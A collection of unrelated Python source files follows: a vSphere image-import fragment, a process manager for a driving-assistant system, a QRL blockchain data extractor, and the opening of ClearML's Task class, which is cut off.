if not find(si, rootFolder, vim.Datastore, pool):
return {'result': 'failure', 'reason': "Pool %s not found" % pool}
if not os.path.exists('/tmp/%s' % shortimage):
pprint("Downloading locally %s" % shortimage)
downloadcmd = "curl -Lo /tmp/%s -f '%s'" % (shortimage, url)
code = os.system(downloadcmd)
if code != 0:
return {'result': 'failure', 'reason': "Unable to download indicated image"}
else:
pprint("Using found /tmp/%s" % shortimage)
vmdk_path = None
ovf_path = None
if url.endswith('zip'):
with ZipFile("/tmp/%s" % shortimage) as zipf:
for _fil in zipf.namelist():
if _fil.endswith('vmdk'):
vmdk_path = '/tmp/%s' % _fil
elif _fil.endswith('ovf'):
ovf_path = '/tmp/%s' % _fil
if vmdk_path is None or ovf_path is None:
return {'result': 'failure', 'reason': "Incorrect ova file"}
zipf.extractall('/tmp')
elif url.endswith('ova'):
with tarfile.open("/tmp/%s" % shortimage) as tar:
for _fil in [x.name for x in tar.getmembers()]:
if _fil.endswith('vmdk'):
vmdk_path = '/tmp/%s' % _fil
elif _fil.endswith('ovf'):
ovf_path = '/tmp/%s' % _fil
if vmdk_path is None or ovf_path is None:
return {'result': 'failure', 'reason': "Incorrect ova file"}
tar.extractall('/tmp')
else:
extension = os.path.splitext(shortimage)[1].replace('.', '')
vmdk_path = "/tmp/%s" % shortimage.replace(extension, 'vmdk')
if not os.path.exists(vmdk_path):
pprint("Converting qcow2 file to vmdk")
os.popen("qemu-img convert -O vmdk -o subformat=streamOptimized /tmp/%s %s" % (shortimage, vmdk_path))
ovf_path = "/tmp/%s" % shortimage.replace(extension, 'ovf')
commondir = os.path.dirname(common.pprint.__code__.co_filename)
time.sleep(5)
vmdk_info = json.loads(os.popen("qemu-img info %s --output json" % vmdk_path).read())
virtual_size = vmdk_info['virtual-size']
actual_size = vmdk_info['actual-size']
ovfcontent = open("%s/vm.ovf.j2" % commondir).read().format(name=shortimage, virtual_size=virtual_size,
actual_size=actual_size)
with open(ovf_path, 'w') as f:
f.write(ovfcontent)
ovfd = open(ovf_path).read()
ovfd = re.sub('<Name>.*</Name>', '<Name>%s</Name>' % name, ovfd)
datastore = find(si, rootFolder, vim.Datastore, pool)
network = find(si, rootFolder, vim.Network, 'VM Network')
networkmapping = vim.OvfManager.NetworkMapping.Array()
nm = vim.OvfManager.NetworkMapping(name="VM Network", network=network)
networkmapping.append(nm)
spec_params = vim.OvfManager.CreateImportSpecParams(diskProvisioning="thin", networkMapping=networkmapping)
import_spec = manager.CreateImportSpec(ovfd, resourcepool, datastore, spec_params)
lease = resourcepool.ImportVApp(import_spec.importSpec, vmFolder)
while True:
if lease.state == vim.HttpNfcLease.State.ready:
pprint("Uploading vmdk")
warning("If hitting any issues when uploading image, please upload manually")
host = self._getfirshost()
url = lease.info.deviceUrl[0].url.replace('*', host.name)
keepalive_thread = Thread(target=keep_lease_alive, args=(lease,))
keepalive_thread.start()
upload_cmd = (
"curl -sS -X POST --insecure -T %s -H 'Content-Type: \
application/x-vnd.vmware-streamVmdk' %s" % (vmdk_path, url))
os.system(upload_cmd)
# lease.Complete()
lease.HttpNfcLeaseComplete()
keepalive_thread.join()
# self.export(name)
# os.remove('/tmp/%s' % shortimage)
# os.remove(ovf_path)
# os.remove(vmdk_path)
return {'result': 'success'}
elif lease.state == vim.HttpNfcLease.State.error:
error("Lease error: %s" % lease.error)
os._exit(1)
def _getfirshost(self):
si = self.si
rootFolder = self.rootFolder
o = si.content.viewManager.CreateContainerView(rootFolder, [vim.HostSystem], True)
view = o.view
o.Destroy()
host = view[0] if view else None
return host
def report(self):
si = self.si
about = si.content.about
print("Host: %s" % self.vcip)
print("Datacenter: %s" % self.dc.name)
print("Version: %s" % about.version)
print("Api Version: %s" % about.apiVersion)
print("Datacenter: %s" % self.dc.name)
rootFolder = self.rootFolder
o = si.content.viewManager.CreateContainerView(rootFolder, [vim.HostSystem], True)
view = o.view
o.Destroy()
for h in view:
print("Host: %s" % h.name)
o = si.content.viewManager.CreateContainerView(rootFolder, [vim.ComputeResource], True)
view = o.view
o.Destroy()
for clu in view:
print("Cluster: %s" % clu.name)
for dts in clu.datastore:
print("Pool: %s" % dts.name)
def delete_image(self, image, pool=None):
si = self.si
vmFolder = self.dc.vmFolder
vm = findvm(si, vmFolder, image)
if vm is None or not vm.config.template:
return {'result': 'failure', 'reason': 'Image %s not found' % image}
else:
t = vm.Destroy_Task()
waitForMe(t)
return {'result': 'success'}
def export(self, name, image=None):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
if vm.runtime.powerState == "poweredOn":
t = vm.PowerOffVM_Task()
waitForMe(t)
vm.MarkAsTemplate()
if image is not None:
vm.Rename(image)
return {'result': 'success'}
def list_dns(self, domain):
return []
def create_bucket(self, bucket, public=False):
print("not implemented")
return
def delete_bucket(self, bucket):
print("not implemented")
return
def delete_from_bucket(self, bucket, path):
print("not implemented")
return
def download_from_bucket(self, bucket, path):
print("not implemented")
return
def upload_to_bucket(self, bucket, path, overrides={}, temp_url=False, public=False):
print("not implemented")
return
def list_buckets(self):
print("not implemented")
return []
def list_bucketfiles(self, bucket):
print("not implemented")
return []
|
process.py
|
import importlib
import os
import signal
import struct
import time
import subprocess
from abc import ABC, abstractmethod
from multiprocessing import Process
from setproctitle import setproctitle # pylint: disable=no-name-in-module
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.swaglog import cloudlog
from selfdrive.hardware import HARDWARE
from cereal import log
WATCHDOG_FN = "/dev/shm/wd_"
ENABLE_WATCHDOG = os.getenv("NO_WATCHDOG") is None
def launcher(proc, name):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# create new context since we forked
messaging.context = messaging.Context()
# add daemon name to cloudlog ctx
cloudlog.bind(daemon=name)
# exec the process
mod.main()
except KeyboardInterrupt:
cloudlog.warning(f"child {proc} got SIGINT")
except Exception:
# can't install the crash handler because sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.monotonic()
while time.monotonic() - t < timeout and process.exitcode is None:
time.sleep(0.001)
class ManagerProcess(ABC):
unkillable = False
daemon = False
sigkill = False
proc = None
enabled = True
name = ""
last_watchdog_time = 0
watchdog_max_dt = None
watchdog_seen = False
shutting_down = False
@abstractmethod
def prepare(self):
pass
@abstractmethod
def start(self):
pass
def restart(self):
self.stop()
self.start()
def check_watchdog(self, started):
if self.watchdog_max_dt is None or self.proc is None:
return
try:
fn = WATCHDOG_FN + str(self.proc.pid)
self.last_watchdog_time = struct.unpack('Q', open(fn, "rb").read())[0]
except Exception:
pass
dt = sec_since_boot() - self.last_watchdog_time / 1e9
if dt > self.watchdog_max_dt:
# Only restart while offroad for now
if self.watchdog_seen and ENABLE_WATCHDOG:
cloudlog.error(f"Watchdog timeout for {self.name} (exitcode {self.proc.exitcode}) restarting ({started=})")
self.restart()
else:
self.watchdog_seen = True
def stop(self, retry=True, block=True):
if self.proc is None:
return
if self.proc.exitcode is None:
if not self.shutting_down:
cloudlog.info(f"killing {self.name}")
sig = signal.SIGKILL if self.sigkill else signal.SIGINT
self.signal(sig)
self.shutting_down = True
if not block:
return
join_process(self.proc, 5)
# If process failed to die send SIGKILL or reboot
if self.proc.exitcode is None and retry:
if self.unkillable:
cloudlog.critical(f"unkillable process {self.name} failed to exit! rebooting in 15 if it doesn't die")
join_process(self.proc, 15)
if self.proc.exitcode is None:
cloudlog.critical(f"unkillable process {self.name} failed to die!")
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info(f"killing {self.name} with SIGKILL")
self.signal(signal.SIGKILL)
self.proc.join()
ret = self.proc.exitcode
cloudlog.info(f"{self.name} is dead with {ret}")
if self.proc.exitcode is not None:
self.shutting_down = False
self.proc = None
return ret
def signal(self, sig):
if self.proc is None:
return
# Don't signal if already exited
if self.proc.exitcode is not None and self.proc.pid is not None:
return
cloudlog.info(f"sending signal {sig} to {self.name}")
os.kill(self.proc.pid, sig)
def get_process_state_msg(self):
state = log.ManagerState.ProcessState.new_message()
state.name = self.name
if self.proc:
state.running = self.proc.is_alive()
state.shouldBeRunning = self.proc is not None and not self.shutting_down
state.pid = self.proc.pid or 0
state.exitCode = self.proc.exitcode or 0
return state
class NativeProcess(ManagerProcess):
def __init__(self, name, cwd, cmdline, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.cwd = cwd
self.cmdline = cmdline
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self):
pass
def start(self):
# In case we only tried a non blocking stop we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cwd = os.path.join(BASEDIR, self.cwd)
cloudlog.info(f"starting process {self.name}")
self.proc = Process(name=self.name, target=nativelauncher, args=(self.cmdline, cwd))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class PythonProcess(ManagerProcess):
def __init__(self, name, module, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.module = module
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self):
if self.enabled:
cloudlog.info(f"preimporting {self.module}")
importlib.import_module(self.module)
def start(self):
# In case we only tried a non blocking stop we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cloudlog.info(f"starting python {self.module}")
self.proc = Process(name=self.name, target=launcher, args=(self.module, self.name))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class DaemonProcess(ManagerProcess):
"""Python process that has to stay running across manager restart.
This is used for athena so you don't lose SSH access when restarting manager."""
def __init__(self, name, module, param_name, enabled=True):
self.name = name
self.module = module
self.param_name = param_name
self.enabled = enabled
self.persistent = True
def prepare(self):
pass
def start(self):
params = Params()
pid = params.get(self.param_name, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if self.module in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info(f"starting daemon {self.name}")
proc = subprocess.Popen(['python', '-m', self.module], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(self.param_name, str(proc.pid))
def stop(self, retry=True, block=True):
pass
def ensure_running(procs, started, driverview=False, not_run=None):
if not_run is None:
not_run = []
for p in procs:
if p.name in not_run:
p.stop(block=False)
elif not p.enabled:
p.stop(block=False)
elif p.persistent:
p.start()
elif p.driverview and driverview:
p.start()
elif started:
p.start()
else:
p.stop(block=False)
p.check_watchdog(started)
|
getData.py
|
import plyvel
import argparse
import base64
import binascii
from datetime import datetime
import json
import sys
from qrl.core.PaginatedData import PaginatedData
from qrl.core.PaginatedBitfield import PaginatedBitfield
from qrl.core.misc.db import DB
from qrl.generated import qrl_pb2
from google.protobuf.json_format import MessageToJson, Parse, MessageToDict
import multiprocessing
class getData:
def getBlockHeight(source):
dbb = plyvel.DB(source)
blockheight = int.from_bytes(dbb.get(b'blockheight'), byteorder='big', signed=False)
return blockheight
def getBlockData(i, source ):
dbb = plyvel.DB(source)
pbdata = qrl_pb2.Block()
block_number_mapping = qrl_pb2.BlockNumberMapping()
hashHeader = Parse(dbb.get(str(i).encode()), block_number_mapping).headerhash
pbdata.ParseFromString(bytes(dbb.get(hashHeader)))
dictData = MessageToDict(pbdata)
# BlockDataPoint and BlockExtended not working yet
#BlockDataPointData = qrl_pb2.BlockDataPoint()
#BlockDataPointData.ParseFromString(bytes(db.get(hashHeader)))
#print(BlockDataPointData)
#BlockDataPointDic = MessageToDict(BlockDataPointData)
#print(BlockDataPointDic)
#print('BlockDataPoint')
#LatticePKData = qrl_pb2.LatticePK()
#LatticePKData.ParseFromString(db.get(addrByte))
#LatticePKDic = MessageToDict(LatticePKData)
#test = Parse(db.get(str(i).encode()), block_number_mapping)
#BlockExtendedData = qrl_pb2.BlockExtended()
#BlockExtendedData.ParseFromString(bytes(db.get(test)))
#print(BlockExtendedData)
#BlockExtendedDic = MessageToDict(BlockExtendedData)
#print(BlockExtendedDic)
#print('BlockExtended')
blockData = {}
blockData["block_number"] = i
blockData["hash_header"] = hashHeader.hex()
blockData["timestamp"] = datetime.fromtimestamp(int(dictData["header"]["timestampSeconds"]))
blockData["reward_block"] = dictData["header"]["rewardBlock"]
blockData["merkle_root"] = dictData["header"]["merkleRoot"]
if "hashHeaderPrev" in dictData["header"]:
blockData["hash_header_prev"] = base64.b64decode(dictData["header"]["hashHeaderPrev"]).hex()
if "rewardFee" in dictData["header"]:
blockData["reward_fee"] = dictData["header"]["rewardFee"]
if "miningNonce" in dictData["header"]:
blockData["mining_nonce"] = int(dictData["header"]["miningNonce"])
if "extraNonce" in dictData["header"]:
blockData["extra_nonce"] = int(dictData["header"]["extraNonce"])
if "genesisBalance" in dictData:
blockData["genesis_balance"] = dictData["genesisBalance"][0]["balance"]
if "transactions" in dictData:
blockData["transactions"] = dictData["transactions"]
return blockData
def getTransactionData(t, block_number, timestamp):
tData = {}
tData["block_number"], tData["timestamp"] = block_number, timestamp
tData["transaction_hash"] = base64.b64decode(t["transactionHash"]).hex()
if "masterAddr" in t:
tData["master_addr"] = "Q" + base64.b64decode(t["masterAddr"]).hex()
if "publicKey" in t:
tData["public_key"] = base64.b64decode(t["publicKey"]).hex()
if "signature" in t:
tData["signature"] = base64.b64decode(t["signature"]).hex()
if "nonce" in t:
tData["nonce"] = t["nonce"]
if "fee" in t:
tData["fee"] = t["fee"]
return tData
def getTransactionDataCoinbase(t, block_number, timestamp):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["addr_to"] = "".join(["Q" , base64.b64decode(t["coinbase"]["addrTo"]).hex()])
tData["amount"] = t["coinbase"]["amount"]
return tData
def getTransactionDataTransfer(t, block_number, timestamp, transfer):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["addr_to"] = "".join(["Q" , base64.b64decode(transfer["addr_to"]).hex()])
tData["amount"] = transfer["amount"]
return tData
def getTransactionDataToken(t, block_number, timestamp):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["symbol"] = base64.b64decode(t["token"]["symbol"]).decode("utf-8")
tData["name"] = base64.b64decode(t["token"]["name"]).decode("utf-8")
tData["owner"] = "".join(["Q" , base64.b64decode(t["token"]["owner"]).hex()])
tData["initial_balances"] = t["token"]["initialBalances"]
tData["initial_balances"] = list(map(lambda x: json.dumps(x), tData["initial_balances"]))
if "decimals" in t["token"]:
tData["decimals"] = t["token"]["decimals"]
return tData
def getTransactionDataMessage(t, block_number, timestamp):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["message_hash"] = t["message"]["messageHash"]
try:
messageHash = base64.b64decode(t["message"]["messageHash"]).decode("utf-8")
tData["message_text"] = messageHash
except:
messageHash = base64.b64decode(t["message"]["messageHash"]).hex()
tData["message_text"] = messageHash
#https://github.com/theQRL/qips/blob/master/qips/QIP002.md
if messageHash.startswith("afaf"):
if messageHash.startswith("afafa1"):
try:
docText = binascii.a2b_hex(messageHash[46:]).decode("utf-8")
except:
docText = binascii.a2b_hex(messageHash[46:]).hex()
tData["message_text"] = " ".join(["[Doc notarization] SHA1:" , messageHash[6:46] , "TEXT:" , docText])
elif messageHash.startswith("afafa2"):
try:
docText = binascii.a2b_hex(messageHash[70:]).decode("utf-8")
except:
docText = binascii.a2b_hex(messageHash[70:]).hex()
tData["message_text"] = " ".join(["[Doc notarization] SHA256:" , messageHash[6:70] , "TEXT:" , docText])
elif messageHash.startswith("afafa3"):
try:
docText = binascii.a2b_hex(messageHash[38:]).decode("utf-8")
except:
docText = binascii.a2b_hex(messageHash[38:]).hex()
tData["message_text"] = " ".join(["[Doc notarization] MD5:" , messageHash[6:38] , "TEXT:" , docText ])
#https://github.com/theQRL/message-transaction-encoding
elif messageHash.startswith("0f0f"):
msgHeader = "[Unknown]"
msgBegin = 8
text = ""
if messageHash.startswith("0f0f0000") or messageHash.startswith("0f0f0001"):
msgHeader = "[Reserved] "
elif messageHash.startswith("0f0f0002"):
if messageHash.startswith("0f0f0002af"):
msgHeader = "[Keybase-remove] "
elif messageHash.startswith("0f0f0002aa"):
msgHeader = "[Keybase-add] "
else:
msgHeader = "".join(["[Keybase-" , messageHash[8:10] , "]" ])
msgBegin = 12
try:
user = binascii.a2b_hex(messageHash[msgBegin:].split("20")[0]).decode("utf-8")
keybaseHex = binascii.a2b_hex(messageHash[msgBegin + len(user)*2 + 2:]).hex()
text = "".join(["USER:" , user , " KEYBASE_HEX:" , keybaseHex ])
except:
text = ""
elif messageHash.startswith("0f0f0003"):
if messageHash.startswith("0f0f0002af"):
msgHeader = "[Github-remove] "
elif messageHash.startswith("0f0f0002aa"):
msgHeader = "[Github-add] "
else:
msgHeader = "".join(["[Github-" , messageHash[8:10] , "] " ])
msgBegin = 18
text = binascii.a2b_hex(messageHash[msgBegin:]).hex()
elif messageHash.startswith("0f0f0004"):
msgHeader = "[Vote] "
if len(text) == 0:
try:
text = binascii.a2b_hex(messageHash[msgBegin:]).decode("utf-8")
except:
try:
text = binascii.a2b_hex(messageHash[msgBegin:]).hex()
except:
text = str(messageHash[msgBegin:])
tData["message_text"] = " ".join([msgHeader , text ])
return tData
def getTransactionDataLatticePk(t, block_number, timestamp):
tData = getData.getTransactionData(t, block_number, timestamp)
print('&&&&&&&&&&&&&')
print('latticePk - T')
for key, value in t.items() :
print(key)
print('--------------------')
print('--------------------')
for key, value in t["latticePk"].items() :
print(key)
print('^^^^^^^^^^^^^^^^')
tData["kyber_pk"] = t["latticePk"]["kyberPK"]
tData["dilithium_pk"] = t["latticePk"]["dilithiumPK"]
return tData
def getTransactionDataSlave(t, block_number, timestamp, transfer):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["slave_pk"] = "".join(["Q" , base64.b64decode(transfer["slave_pk"]).hex()])
tData["access_type"] = transfer["access_type"]
return tData
def getTransactionDataTransferToken(t, block_number, timestamp, transfer):
tData = getData.getTransactionData(t, block_number, timestamp)
tData["token_txhash"] = transfer["token_txhash"]
tData["addr_to"] = "".join(["Q" , base64.b64decode(transfer["addr_to"]).hex()])
tData["amount"] = transfer["amount"]
return tData
def getTransactionDataOthers(t, block_number, timestamp):
tData = getData.getTransactionData(t, block_number, timestamp)
print('------------------------')
print('not transactionProcessed')
print('------------------------')
print(t)
print('------------------------')
if "multiSigCreate" in t:
tData['type'] = "multiSigCreate"
if "multiSigSpend" in t:
tData['type'] = "multiSigSpend"
if "multiSigVote" in t:
tData['type'] = "multiSigVote"
if len(tData['type']) == 0:
tData['type'] = "unkown"
for key, value in tData.items() :
print(key)
print('--------------------')
print('--------------------')
print('transaction unkown')
sys.exit("transaction unkown")
tData['data'] = str(t)
return tData
def getAddressData(source, b64Addr, timeStamp):
try:
#addrData = qrl_pb2.AddressState()
addrData = qrl_pb2.OptimizedAddressState()
addrByte = base64.b64decode(b64Addr)
address = "Q" + addrByte.hex()
tree_dict = {
0: 256,
8: 256,
10: 256,
12 : 256,
14: 256,
16: 256,
18 : 256,
}
tree_height = int(address[4]) * 2
dbb = plyvel.DB(source)
addrData.ParseFromString(dbb.get(addrByte))
dictData = MessageToDict(addrData)
databasee = DB()
n = 0
false_loop = 0
OTSBitfieldByPageDic = []
while n < tree_dict[tree_height]:
page = (n // 8192) + 1
PaginatedBitfieldKey = PaginatedBitfield.generate_bitfield_key(PaginatedBitfield(False, databasee), addrByte, page)
obj = PaginatedBitfield(False, databasee)
obj.load_bitfield(addrByte, n)
ots_bitfield = obj.key_value[PaginatedBitfieldKey]
OTSBitfieldByPageDic.append(PaginatedBitfield.ots_key_reuse(ots_bitfield, n))
if PaginatedBitfield.ots_key_reuse(ots_bitfield, n) == False:
false_loop = false_loop + 1
if false_loop > 5:
break
# print(PaginatedBitfield.ots_key_reuse(ots_bitfield, n))
n = n + 1
OTSBitfieldByPageData = qrl_pb2.OTSBitfieldByPage()
OTSBitfieldByPageData.ParseFromString(dbb.get(addrByte))
# OTSBitfieldByPageDic = MessageToDict(OTSBitfieldByPageData)
#print(OTSBitfieldByPageDic)
#print('OTSBitfieldByPage')
DataList = qrl_pb2.DataList()
DataListData = qrl_pb2.DataList()
DataListData.ParseFromString(dbb.get(addrByte))
DataListDic = MessageToDict(DataListData)
#print(DataListDic)
#print('DataList')
BitfieldData = qrl_pb2.Bitfield()
BitfieldData.ParseFromString(dbb.get(addrByte))
BitfieldDic = MessageToDict(BitfieldData)
#print(BitfieldDic)
#print('Bitfield')
TransactionHashListData = qrl_pb2.TransactionHashList()
TransactionHashListData.ParseFromString(dbb.get(addrByte))
TransactionHashListDic = MessageToDict(TransactionHashListData)
#print(TransactionHashListDic)
#print('TransactionHashList')
LatticePKData = qrl_pb2.LatticePK()
LatticePKData.ParseFromString(dbb.get(addrByte))
LatticePKDic = MessageToDict(LatticePKData)
#print(LatticePKDic)
#print('LatticePK')
MultiSigAddressStateData = qrl_pb2.MultiSigAddressState()
MultiSigAddressStateData.ParseFromString(dbb.get(addrByte))
MultiSigAddressStateDic = MessageToDict(MultiSigAddressStateData)
#print(MultiSigAddressStateDic)
#print('MultiSigAddressStateDic')
MultiSigAddressesListData = qrl_pb2.MultiSigAddressesList()
MultiSigAddressesListData.ParseFromString(dbb.get(addrByte))
MultiSigAddressesListDic = MessageToDict(MultiSigAddressesListData)
#print(MultiSigAddressesListDic)
#print('MultiSigAddressesListDic')
addressData = {}
if "balance" in dictData:
addressData["balance"] = dictData["balance"]
else:
addressData["balance"] = "0"
if "nonce" in dictData:
addressData["nonce"] = dictData["nonce"]
if "usedOtsKeyCount" in dictData:
addressData["use_otskey_count"] = dictData["usedOtsKeyCount"]
if "transactionHashCount" in dictData:
addressData["transaction_hash_count"] = dictData["transactionHashCount"]
if "tokensCount" in dictData:
addressData["tokens_count"] = dictData["tokensCount"]
if "slavesCount" in dictData:
addressData["slaves_count"] = dictData["slavesCount"]
if OTSBitfieldByPageDic:
addressData["ots_bitfield"] = OTSBitfieldByPageDic
if "pageNumber" in OTSBitfieldByPageDic:
addressData["ots_bitfield_page_number"] = OTSBitfieldByPageDic["pageNumber"]
if "values" in DataListDic:
addressData["data_list"] = DataListDic["values"]
if "bitfields" in BitfieldDic:
addressData["bitfields"] = BitfieldDic["bitfields"]
if "hashes" in TransactionHashListDic:
addressData["transactionhash_list"] = TransactionHashListDic["hashes"]
if "kyberPk" in LatticePKDic:
addressData["kyber_pk"] = LatticePKDic["kyberPk"]
if "address" in MultiSigAddressStateDic:
addressData["multi_sig_addresses_hashes_address"] = MultiSigAddressStateDic["address"]
if "nonce" in MultiSigAddressStateDic:
addressData["multi_sig_addresses_hashes_nonce"] = MultiSigAddressStateDic["nonce"]
if "weights" in MultiSigAddressStateDic:
addressData["multi_sig_addresses_hashes_weights"] = MultiSigAddressStateDic["weights"]
if "hashes" in MultiSigAddressesListDic:
addressData["multi_sig_addresses_list_hashes"] = MultiSigAddressesListDic["hashes"]
addressData["last_seen"] = timeStamp
addressData["first_seen"] = timeStamp
addressData["address"] = address
return addressData
except Exception as e:
print(e)
raise
if __name__ == "__main__":
# Creates two processes
p1 = multiprocessing.Process(target=getData)
p2 = multiprocessing.Process(target=getData)
p3 = multiprocessing.Process(target=getData)
p4 = multiprocessing.Process(target=getData)
p5 = multiprocessing.Process(target=getData)
p6 = multiprocessing.Process(target=getData)
p7 = multiprocessing.Process(target=getData)
p8 = multiprocessing.Process(target=getData)
# Starts both processes
p1.start()
p2.start()
p3.start()
p4.start()
p5.start()
p6.start()
p7.start()
p8.start()
|
task.py
|
import atexit
import json
import os
import shutil
import signal
import sys
import threading
import time
from argparse import ArgumentParser
from logging import getLogger
from operator import attrgetter
from tempfile import mkstemp, mkdtemp
from zipfile import ZipFile, ZIP_DEFLATED
try:
# noinspection PyCompatibility
from collections.abc import Sequence as CollectionsSequence
except ImportError:
from collections import Sequence as CollectionsSequence
from typing import Optional, Union, Mapping, Sequence, Any, Dict, Iterable, TYPE_CHECKING, Callable, Tuple, List
import psutil
import six
from pathlib2 import Path
from .backend_config.defs import get_active_config_file, get_config_file
from .backend_api.services import tasks, projects
from .backend_api.session.session import (
Session, ENV_ACCESS_KEY, ENV_SECRET_KEY, ENV_HOST, ENV_WEB_HOST, ENV_FILES_HOST, )
from .backend_interface.metrics import Metrics
from .backend_interface.model import Model as BackendModel
from .backend_interface.task import Task as _Task
from .backend_interface.task.log import TaskHandler
from .backend_interface.task.development.worker import DevWorker
from .backend_interface.task.repo import ScriptInfo
from .backend_interface.task.models import TaskModels
from .backend_interface.util import get_single_result, exact_match_regex, make_message, mutually_exclusive, get_queue_id
from .binding.absl_bind import PatchAbsl
from .binding.artifacts import Artifacts, Artifact
from .binding.environ_bind import EnvironmentBind, PatchOsFork
from .binding.frameworks.fastai_bind import PatchFastai
from .binding.frameworks.lightgbm_bind import PatchLIGHTgbmModelIO
from .binding.frameworks.pytorch_bind import PatchPyTorchModelIO
from .binding.frameworks.tensorflow_bind import TensorflowBinding
from .binding.frameworks.xgboost_bind import PatchXGBoostModelIO
from .binding.frameworks.megengine_bind import PatchMegEngineModelIO
from .binding.joblib_bind import PatchedJoblib
from .binding.matplotlib_bind import PatchedMatplotlib
from .binding.hydra_bind import PatchHydra
from .binding.click_bind import PatchClick
from .binding.jsonargs_bind import PatchJsonArgParse
from .config import (
config, DEV_TASK_NO_REUSE, get_is_master_node, DEBUG_SIMULATE_REMOTE_TASK, DEV_DEFAULT_OUTPUT_URI,
deferred_config, TASK_SET_ITERATION_OFFSET, )
from .config import running_remotely, get_remote_task_id
from .config.cache import SessionCache
from .debugging.log import LoggerRoot
from .errors import UsageError
from .logger import Logger
from .model import Model, InputModel, OutputModel
from .task_parameters import TaskParameters
from .utilities.config import verify_basic_value
from .binding.args import (
argparser_parseargs_called, get_argparser_last_args,
argparser_update_currenttask, )
from .utilities.dicts import ReadOnlyDict, merge_dicts
from .utilities.proxy_object import (
ProxyDictPreWrite, ProxyDictPostWrite, flatten_dictionary,
nested_from_flat_dictionary, naive_nested_from_flat_dictionary, )
from .utilities.resource_monitor import ResourceMonitor
from .utilities.seed import make_deterministic
from .utilities.lowlevel.threads import get_current_thread_id
from .utilities.process.mp import BackgroundMonitor, leave_process
# noinspection PyProtectedMember
from .backend_interface.task.args import _Arguments
if TYPE_CHECKING:
import pandas
import numpy
from PIL import Image
class Task(_Task):
"""
The ``Task`` class is a code template for a Task object which, together with its connected experiment components,
represents the current running experiment. These connected components include hyperparameters, loggers,
configuration, label enumeration, models, and other artifacts.
The term "main execution Task" refers to the Task context for current running experiment. Python experiment scripts
can create one, and only one, main execution Task. It is a traceable, and after a script runs and ClearML stores
the Task in the **ClearML Server** (backend), it is modifiable, reproducible, executable by a worker, and you
can duplicate it for further experimentation.
The ``Task`` class and its methods allow you to create and manage experiments, as well as perform
advanced experimentation functions, such as autoML.
.. warning::
Do not construct Task objects directly. Use one of the methods listed below to create experiments or
reference existing experiments.
For detailed information about creating Task objects, see the following methods:
- Create a new reproducible Task - :meth:`Task.init`
.. important::
In some cases, ``Task.init`` may return a Task object which is already stored in **ClearML Server** (already
initialized), instead of creating a new Task. For a detailed explanation of those cases, see the ``Task.init``
method.
- Manually create a new Task (no auto-logging will apply) - :meth:`Task.create`
- Get the current running Task - :meth:`Task.current_task`
- Get another (different) Task - :meth:`Task.get_task`
.. note::
The **ClearML** documentation often refers to a Task as, "Task (experiment)".
"Task" refers to the class in the ClearML Python Client Package, the object in your Python experiment script,
and the entity with which **ClearML Server** and **ClearML Agent** work.
"Experiment" refers to your deep learning solution, including its connected components, inputs, and outputs,
and is the experiment you can view, analyze, compare, modify, duplicate, and manage using the ClearML
**Web-App** (UI).
Therefore, a "Task" is effectively an "experiment", and "Task (experiment)" encompasses its usage throughout
the ClearML.
The exception to this Task behavior is sub-tasks (non-reproducible Tasks), which do not use the main execution
Task. Creating a sub-task always creates a new Task with a new Task ID.
"""
TaskTypes = _Task.TaskTypes
NotSet = object()
__create_protection = object()
__main_task = None # type: Optional[Task]
__exit_hook = None
__forked_proc_main_pid = None
__task_id_reuse_time_window_in_hours = deferred_config('development.task_reuse_time_window_in_hours', 24.0, float)
__detect_repo_async = deferred_config('development.vcs_repo_detect_async', False)
__default_output_uri = DEV_DEFAULT_OUTPUT_URI.get() or deferred_config('development.default_output_uri', None)
class _ConnectedParametersType(object):
argparse = "argument_parser"
dictionary = "dictionary"
task_parameters = "task_parameters"
@classmethod
def _options(cls):
return {
var for var, val in vars(cls).items()
if isinstance(val, six.string_types)
}
def __init__(self, private=None, **kwargs):
"""
.. warning::
**Do not construct Task manually!**
Please use :meth:`Task.init` or :meth:`Task.get_task`
"""
if private is not Task.__create_protection:
raise UsageError(
'Task object cannot be instantiated externally, use Task.current_task() or Task.get_task(...)')
self._repo_detect_lock = threading.RLock()
super(Task, self).__init__(**kwargs)
self._arguments = _Arguments(self)
self._logger = None
self._connected_output_model = None
self._dev_worker = None
self._connected_parameter_type = None
self._detect_repo_async_thread = None
self._resource_monitor = None
self._calling_filename = None
self._remote_functions_generated = {}
# register atexit, so that we mark the task as stopped
self._at_exit_called = False
@classmethod
